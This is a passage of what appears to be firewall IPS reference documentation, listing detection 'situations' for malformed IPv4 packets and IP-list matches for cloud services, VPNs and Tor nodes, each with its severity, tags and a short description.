Description: An IP packet with extra padding was detected. An ethernet frame with an IP packet contains extra padding after the IP header. This type of IP datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is low. The packet was either corrupted in transit or it was crafted manually. However, all hosts tend to ignore such extra padding. Most relevant log fields: "Eth frame length" shows the length of the Ethernet frame that encapsulates the IP datagram. "IP offset" shows the number of bytes in the Ethernet header preceding the IP datagram. "IP total length" shows the total length of the IP datagram.
Back to top

IP_Length-Total-Error

About this situation: IPv4 packet with erroneous total length
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Vulnerability: Red-Hat-Netkvm-Virtio-Win-GetXxpHeaderAndPayloadLen-Integer-Underflow
Description: The total length of an IP packet exceeds the data length of the Ethernet frame. Alternatively, the total length of the IP packet is too small to carry even the IP header itself. This type of IPv4 packet should not be generated according to the TCP/IP specifications. The packet is either corrupted in transit or it was crafted manually. Such a packet should not be accepted by the receiving host or forwarded by any intermediate router. Risk analysis: Risk level is medium. Some hosts that do not properly check the IP packet header length could be vulnerable to a denial of service or execution of arbitrary code. Most relevant log fields: "Eth frame length" shows the length of the Ethernet frame that encapsulates the IP datagram. "IP offset" shows the number of bytes in the Ethernet header preceding the IP datagram. "IP total length" shows the total length of the IP datagram. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Line_Messenger

About this situation: Line Messenger IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Description: A situation to match known Line Messenger IP Addresses.
Back to top

IP_Linode

About this situation: Linode IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-859-5242
Description: A situation for IP addresses matching to known Linode hosts.
Back to top

IP_LogMeIn_GoToMeeting

About this situation: LogMeIn GoToMeeting IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1281-5242
Last changed: sgpkg-ips-1281-5242
Description: A situation for IP addresses matching to known LogMeIn GoToMeeting hosts.
Back to top

IP_Malicious-Sites

About this situation: Malicious site IP address matched
Context: IP list ID for source or destination address
Severity: 8
Tags: Potential Compromise
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1223-5242
Description: A situation to match suspected malicious site IP addresses. The IP list is not a proper replacement for a URL reputation service.
Back to top

IP_Microsoft-Office-365-Common-Or-Office-Online

About this situation: Microsoft Office 365 Common or Office Online IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Description: A situation for known Microsoft Office 365 Common and Office Online IP addresses.
Back to top

IP_Microsoft-Office-365-Exchange-Online

About this situation: Microsoft Office 365 Exchange Online IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Description: A situation for known Microsoft Office 365 Exchange Online IP addresses.
Back to top

IP_Microsoft-Office-365-Sharepoint-Online-Or-OneDrive-For-Business

About this situation: Microsoft Office 365 SharePoint Online or OneDrive for Business IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Description: A situation for known Microsoft Office 365 SharePoint Online and OneDrive for Business addresses.
Back to top

IP_Microsoft-Office-365-Skype-For-Business-Online-Or-Teams

About this situation: Microsoft Office 365 Skype for Business Online or Microsoft Teams IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1100-5242
Description: A situation for known Microsoft Office 365 Skype for Business Online and Microsoft Teams IP addresses.
Back to top

IP_microsoft_azure

About this situation: Matched Microsoft Azure datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description: A situation for known Microsoft Azure datacenter IP address.
Back to top

IP_microsoft_azure_active_directory

About this situation: Matched Microsoft Azure Active Directory IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1194-5242
Description: A situation for known Microsoft Azure Active Directory IP addresses.
Back to top

IP_microsoft_azure_asiaeast

About this situation: Matched Microsoft Azure ASIAEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure ASIAEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_asiasoutheast

About this situation: Matched Microsoft Azure ASIASOUTHEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure ASIASOUTHEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_australiaeast

About this situation: Matched Microsoft Azure AUSTRALIAEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure AUSTRALIAEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_australiasoutheast

About this situation: Matched Microsoft Azure AUSTRALIASOUTHEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure AUSTRALIASOUTHEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_brazilsouth

About this situation: Matched Microsoft Azure BRAZILSOUTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure BRAZILSOUTH datacenter IP addresses.
Back to top

IP_microsoft_azure_canadacentral

About this situation: Matched Microsoft Azure CANADACENTRAL datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure CANADACENTRAL datacenter IP addresses.
Back to top

IP_microsoft_azure_canadaeast

About this situation: Matched Microsoft Azure CANADAEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure CANADAEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_europenorth

About this situation: Matched Microsoft Azure EUROPENORTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure EUROPENORTH datacenter IP addresses.
Back to top

IP_microsoft_azure_europewest

About this situation: Matched Microsoft Azure EUROPEWEST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure EUROPEWEST datacenter IP addresses.
Back to top

IP_microsoft_azure_francec

About this situation: Matched Microsoft Azure FRANCEC datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure FRANCEC datacenter IP addresses.
Back to top

IP_microsoft_azure_frances

About this situation: Matched Microsoft Azure FRANCES datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure FRANCES datacenter IP addresses.
Back to top

IP_microsoft_azure_indiacentral

About this situation: Matched Microsoft Azure INDIACENTRAL datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure INDIACENTRAL datacenter IP addresses.
Back to top

IP_microsoft_azure_indiasouth

About this situation: Matched Microsoft Azure INDIASOUTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure INDIASOUTH datacenter IP addresses.
Back to top

IP_microsoft_azure_indiawest

About this situation: Matched Microsoft Azure INDIAWEST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure INDIAWEST datacenter IP addresses.
Back to top

IP_microsoft_azure_japaneast

About this situation: Matched Microsoft Azure JAPANEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure JAPANEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_japanwest

About this situation: Matched Microsoft Azure JAPANWEST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure JAPANWEST datacenter IP addresses.
Back to top

IP_microsoft_azure_koreacentral

About this situation: Matched Microsoft Azure KOREACENTRAL datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure KOREACENTRAL datacenter IP addresses.
Back to top

IP_microsoft_azure_koreasouth

About this situation: Matched Microsoft Azure KOREASOUTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure KOREASOUTH datacenter IP addresses.
Back to top

IP_microsoft_azure_uksouth

About this situation: Matched Microsoft Azure UKSOUTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure UKSOUTH datacenter IP addresses.
Back to top

IP_microsoft_azure_ukwest

About this situation: Matched Microsoft Azure UKWEST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure UKWEST datacenter IP addresses.
Back to top

IP_microsoft_azure_uscentral

About this situation: Matched Microsoft Azure USCENTRAL datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USCENTRAL datacenter IP addresses.
Back to top

IP_microsoft_azure_uscentraleuap

About this situation: Matched Microsoft Azure USCENTRALEUAP datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USCENTRALEUAP datacenter IP addresses.
Back to top

IP_microsoft_azure_useast

About this situation: Matched Microsoft Azure USEAST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USEAST datacenter IP addresses.
Back to top

IP_microsoft_azure_useast2

About this situation: Matched Microsoft Azure USEAST2 datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USEAST2 datacenter IP addresses.
Back to top

IP_microsoft_azure_useast2euap

About this situation: Matched Microsoft Azure USEAST2EUAP datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USEAST2EUAP datacenter IP addresses.
Back to top

IP_microsoft_azure_usnorth

About this situation: Matched Microsoft Azure USNORTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USNORTH datacenter IP addresses.
Back to top

IP_microsoft_azure_ussouth

About this situation: Matched Microsoft Azure USSOUTH datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USSOUTH datacenter IP addresses.
Back to top

IP_microsoft_azure_uswest

About this situation: Matched Microsoft Azure USWEST datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USWEST datacenter IP addresses.
Back to top

IP_microsoft_azure_uswest2

About this situation: Matched Microsoft Azure USWEST2 datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USWEST2 datacenter IP addresses.
Back to top

IP_microsoft_azure_uswestcentral

About this situation: Matched Microsoft Azure USWESTCENTRAL datacenter IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Description: A situation for known Microsoft Azure USWESTCENTRAL datacenter IP addresses.
Back to top

IP_Microsoft_Intune

About this situation: Microsoft Intune IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A situation for IP addresses matching to Microsoft Intune.
Back to top

IP_Netflix

About this situation: Netflix IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-939-5242
Last changed: sgpkg-ips-939-5242
Description: A situation for IP addresses matching to known Netflix hosts.
Back to top

IP_NordVPN-Server-IP-Addresses

About this situation: NordVPN server IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1549-5242
Description: A situation to match known NordVPN server IP addresses.
Back to top

IP_Option-Too-Long

About this situation: IPv4 option requires more space than available in IPv4 header
Context: IP without parameters
Severity: 6
Tags: Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Vulnerability: Microsoft-Windows-IP-Validation-Vulnerability
Description: The IPv4 header contains an IP Options field that requires more space than available in the IP header. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is medium. The packet was probably crafted manually to exploit a vulnerability in some TCP/IP implementations, or for information gathering based on the target's reply. For example, exploits against vulnerability CVE-2005-0048 trigger this situation. Most relevant log fields: "IP option number" shows the IP Option number in the IP header. "IP option length" shows the length of the exceedingly long IP Option. (Unless the option was in the last byte of IP options, in which the length could not be determined). Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Option-Too-Short

About this situation: IPv4 option contains illegally small value in length field
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 header contains an IP Options field that contains length field values 0 or 1. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is medium. The packet was probably crafted manually to exploit a vulnerability in some TCP/IP implementations, or for information gathering based on the target's reply. Most relevant log fields: "IP option number" shows the IP Option number in the IP header. "IP option length" shows the length of the exceedingly short IP Option. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Options-Detected

About this situation: IPv4 datagram with IP options detected
Context: IP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-158-2032
Description: An IPv4 datagram with IP options was detected. Risk analysis: Risk level is fairly low. IP options may be used to exploit vulnerabilities in TCP/IP implementations, for example, [CVE-1999-0804]. For this reason, many firewalls drop packets that have any IP Option set. However, IP options are used by some protocols. For example, IGMPv2 [RFC 2236] uses the Router Alert Option [RFC 2113].
Back to top

IP_Options-Length-Inconsistency

About this situation: IPv4 options field with extra padding
Context: IP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An IPv4 header with IP Options has more padding than necessary. Typically the IP Options field is as short as possible. The detected datagram has more padding in the IP Options field than is necessary. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is low. The packet was probably crafted manually to potentially exploit buffer overflow conditions in some TCP/IP implementations.
Back to top

IP_Options-Malformed

About this situation: IPv4 datagram or fragment with malformed IP options detected
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24074
Description: An IPv4 datagram or fragment with malformed IP options was detected. Risk analysis: Risk level is medium. Malformed IP options may be used to exploit vulnerabilities in TCP/IP implementations. For this reason, many firewalls drop packets that have any IP Option set. However, IP options are used by some protocols. For example, IGMPv2 [RFC 2236] uses the Router Alert Option [RFC 2113]. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Options-Unused

About this situation: IPv4 Options after End Of Options field
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: IP Options detected in an IPv4 header after the End Of Options field. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is low. The packet was probably crafted manually to exploit target systems that do not handle the End Of Options correctly. Most relevant log fields: "IP option number" shows the IP Option number in the IP header. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Private-Network

About this situation: Private Network IP matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1088-5242
Description: A private network IP address matched.
Back to top

IP_Quad9

About this situation: Quad9 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description: A situation to match known Quad9 DNS IP addesses.
Back to top

IP_salesforce_all

About this situation: Matched Salesforce IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce IP address.
Back to top

IP_salesforce_apnic

About this situation: Matched Salesforce APNIC IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce APNIC IP address.
Back to top

IP_salesforce_arin

About this situation: Matched Salesforce ARIN IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce ARIN IP address.
Back to top

IP_salesforce_community_cloud

About this situation: Matched Salesforce COMMUNITY IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce COMMUNITY IP address.
Back to top

IP_salesforce_email_apnic

About this situation: Matched Salesforce EMAIL IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce EMAIL IP address.
Back to top

IP_salesforce_email_arin

About this situation: Matched Salesforce EMAIL IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce EMAIL IP address.
Back to top

IP_salesforce_email_ripe

About this situation: Matched Salesforce EMAIL IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce EMAIL IP address.
Back to top

IP_salesforce_ripe

About this situation: Matched Salesforce RIPE IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1055-5242
Description: A situation for known Salesforce RIPE IP address.
Back to top

IP_SAP_Cloud_Platform

About this situation: SAP Cloud Platform IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Description: A situation for IP addresses matching to SAP Cloud Platform.
Back to top

IP_Shoora_VPN

About this situation: Shoora VPN IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Description: A situation to match known Shoora VPN IP addresses.
Back to top

IP_Skype

About this situation: Skype IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A situation to match known Skype IP addresses.
Back to top

IP_Spotify

About this situation: Spotify IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-814-5242
Last changed: sgpkg-ips-814-5242
Description: A situation to match known Spotify IP addresses.
Back to top

IP_Telegram-Network

About this situation: Telegram Network IP address matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1098-5242
Description: A situation to match IP addresses that have been allocated to Telegram Network.
Back to top

IP_Time-To-Live-Zero

About this situation: Time To Live (TTL) value was zero
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The Time To Live (TTL) value was zero in an IPv4 datagram. A packet with zero TTL should no longer be present in the network. The packet should have been dropped by the last forwarding router. An IPv4 datagram with zero TTL should not be sent out according to the TCP/IP specifications. An ICMP packet with zero TTL could be generated by a defective TCP/IP implementation as a reply to traceroute. Packets with zero TTL are typically harmless network anomalies. However, some routers may inadvertently forward packets with zero TTL. At worst, misconfigured routers could forward packets with zero TTL endlessly, thus degrading the network performance. Risk analysis: Risk level is fairly low. Most relevant log fields: "IP source" shows the source IP address in the datagram. "IP destination" shows the destination IP address in the datagram. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_TOR-Exit-Node

About this situation: TOR Exit Node IP matched
Context: IP list ID for source address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-814-5242
Last changed: sgpkg-ips-814-5242
Description: A situation to match known TOR exit node IP addresses.
Back to top

IP_TOR-Launcher-fte-Bridge

About this situation: TOR Launcher default fte bridge IP matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known TOR Launcher default fte bridge IP addresses.
Back to top

IP_TOR-Launcher-obfs3-Bridge

About this situation: TOR Launcher default obfs3 bridge IP matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known TOR Launcher default obfs3 bridge IP addresses.
Back to top

IP_TOR-Launcher-obfs4-Bridge

About this situation: TOR Launcher default obfs4 bridge IP matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known TOR Launcher default obfs4 bridge IP addresses.
Back to top

IP_TOR-Launcher-scramblesuit-Bridge

About this situation: TOR Launcher default scramblesuit bridge IP matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known TOR Launcher default scramblesuit bridge IP addresses.
Back to top

IP_TOR-Relay-Node

About this situation: TOR Relay Node IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known TOR Relay node IP addresses.
Back to top

IP_Webex_Server

About this situation: Matched Webex Server IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1242-5242
Description: A situation for known Webex Server IP address.
Back to top

IP_Webex_Teams

About this situation: Matched Webex Teams IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1240-5242
Description: A situation for known Webex Teams IP address.
Back to top

IP_Whatsapp

About this situation: Whatsapp IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-814-5242
Last changed: sgpkg-ips-814-5242
Description: A situation to match known Whatsapp IP addesses. This list contains IP addresses owned by Whatsapp, and is mostly legacy information due to Whatsapp now being owned by Facebook, and the application mostly using Facebook servers. The IP's owned by Facebook are included in the Facebook IP list.
Back to top

IP_Yealink_Meeting

About this situation: Matched Yealink Meeting IP address
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1787-5242
Last changed: sgpkg-ips-1787-5242
Description: A situation for known Yealink Meeting IP address.
Back to top

IP_YourFreedom

About this situation: Your Freedom IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Description: A situation to match known Your Freedom IP addresses.
Back to top

IP_Zoho_Meeting

About this situation: Zoho Meeting IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1609-5242
Last changed: sgpkg-ips-1609-5242
Description: A situation for IP addresses matching to known Zoho Meeting hosts.
Back to top

IP_Zoom

About this situation: Zoom IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1279-5242
Last changed: sgpkg-ips-1279-5242
Description: A situation to match known Zoom IP addesses.
Back to top

IP_Zscaler

About this situation: Zscaler IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1218-5242
Description: A situation to match known Zscaler IP Addresses.
Back to top

iQIYI

About this situation: iQIYI usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1663-5242
Description: iQIYI is a Chinese video service.
Back to top

Iqms

About this situation: Application Iqms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
